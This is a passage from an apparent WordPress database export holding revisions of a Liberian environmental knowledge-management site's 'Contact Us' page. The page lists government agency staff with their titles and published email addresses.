src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/reeves-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/willabo-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/kullie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Anthony Kullie</strong><br />Director of LHS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Ernest M. Menseah </strong><br />Director of LGS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Wonpue Quellian </strong><br />Research Officer<br />MME<br /><a href=\"mailto:wonpuequellian2017@gmail.com\">wonpuequellian2017@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA<br /><a href=\"&quot;mailto:stephenlavalah@yahoo.com\">stephenlavalah@yahoo.com</a></p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/sherman-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/borbor-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Albert M. Sherman </strong><br />MOT<br /><a href=\"mailto:itssherman@gmail.com\">itssherman@gmail.com</a></p><p><strong>Amos Borbor </strong><br />Finance &amp; Administrative Officer<br />MOT<br /><a href=\"mailto:felixborbor@gmail.com\">felixborbor@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/simpson.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/simpson.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/simpson-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Henry A. Simpson </strong><br />Weather Forecaster<br />MOT<br /><a href=\"mailto:ransford2024@gmail.com\">ransford2024@gmail.com</a></p><p><strong>James Kollie </strong><br />MOT<br /><a href=\"mailto:jameskollie@yahoo.com\">jameskollie@yahoo.com</a></p><p><strong>Eric Pervist </strong><br />MGCSP<br /><a href=\"mailto:gendermedia1@gmail.com\">gendermedia1@gmail.com</a></p><p><strong>N. Mamatu G. King </strong><br />MGCSP<br /><a href=\"mailto:kingmamatu@gmail.com\">kingmamatu@gmail.com</a></p><p><strong>J. Josiah N. Domah </strong><br />MGCSP<br /><a href=\"mailto:josiahdomah@@gmail.com\">josiahdomah@gmail.com</a></p><p><strong>Emmanuel Ballah </strong><br />MGCSP<br /><a href=\"mailto:ballah_@yahoo.com\">ballah_@yahoo.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-29 11:21:11','2021-03-29 11:21:11','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3658,42,'2021-03-29 11:21:11','2021-03-29 11:21:11','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/reeves-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/willabo-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/kullie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Anthony Kullie</strong><br />Director of LHS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Ernest M. Menseah </strong><br />Director of LGS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Wonpue Quellian </strong><br />Research Officer<br />MME<br /><a href=\"mailto:wonpuequellian2017@gmail.com\">wonpuequellian2017@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA<br /><a href=\"&quot;mailto:stephenlavalah@yahoo.com\">stephenlavalah@yahoo.com</a></p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/sherman-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/borbor-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Albert M. Sherman </strong><br />MOT<br /><a href=\"mailto:itssherman@gmail.com\">itssherman@gmail.com</a></p><p><strong>Amos Borbor </strong><br />Finance &amp; Administrative Officer<br />MOT<br /><a href=\"mailto:felixborbor@gmail.com\">felixborbor@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/simpson.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/simpson.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/simpson-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Henry A. Simpson </strong><br />Weather Forecaster<br />MOT<br /><a href=\"mailto:ransford2024@gmail.com\">ransford2024@gmail.com</a></p><p><strong>James Kollie </strong><br />MOT<br /><a href=\"mailto:jameskollie@yahoo.com\">jameskollie@yahoo.com</a></p><p><strong>Eric Pervist </strong><br />MGCSP<br /><a href=\"mailto:gendermedia1@gmail.com\">gendermedia1@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>N. Mamatu G. King </strong><br />MGCSP<br /><a href=\"mailto:kingmamatu@gmail.com\">kingmamatu@gmail.com</a></p><p><strong>J. Josiah N. Domah </strong><br />MGCSP<br /><a href=\"mailto:josiahdomah@@gmail.com\">josiahdomah@gmail.com</a></p><p><strong>Emmanuel G. Ballah </strong><br />MGCSP<br /><a href=\"mailto:emmanuelgballah_@gmail.com\">emmanuelgballah_@gmail.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-29 11:21:11','2021-03-29 11:21:11','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3659,42,'2021-03-29 13:18:34','2021-03-29 13:18:34','','domah','','inherit','open','closed','','domah','','','2021-03-29 13:18:34','2021-03-29 13:18:34','',80,'https://ekmsliberia.info/wp-content/uploads/2021/03/domah.png',0,'attachment','image/png',0),(3661,42,'2021-03-29 13:24:21','2021-03-29 13:24:21','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img 